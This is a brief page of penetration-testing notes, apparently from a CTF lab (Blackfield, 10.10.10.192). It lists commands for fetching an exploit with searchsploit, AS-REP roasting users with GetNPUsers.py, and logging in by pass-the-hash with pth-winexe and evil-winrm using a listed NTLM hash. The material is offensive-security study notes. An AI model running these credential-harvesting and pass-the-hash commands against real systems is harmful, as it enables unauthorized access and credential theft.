Comment on page

04 Windows Enum & Exploit

ExpolitDB
searchsploit -m 48431
searchsploit -m 48431
​
User Enum
When you get a possible user list, using the GetNPUsers.py to get the correct user list with the NTML hash. After that, using the command "pth-winexe","evil-winrm" will the  NTML hash to log in to the windows system.
python3 GetNPUsers.py blackfield.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
# Method 1
pth-winexe -U svc_backup%aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 //10.10.10.192 cmd
​
# Method 2
evil-winrm -U svc_backup -H aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796  -i  10.10.10.192
 
04 Windows Enum & Exploit

Exploitation Guide - Previous

03 Web Enumeration

Windows Credential Dumping

Last modified 2yr ago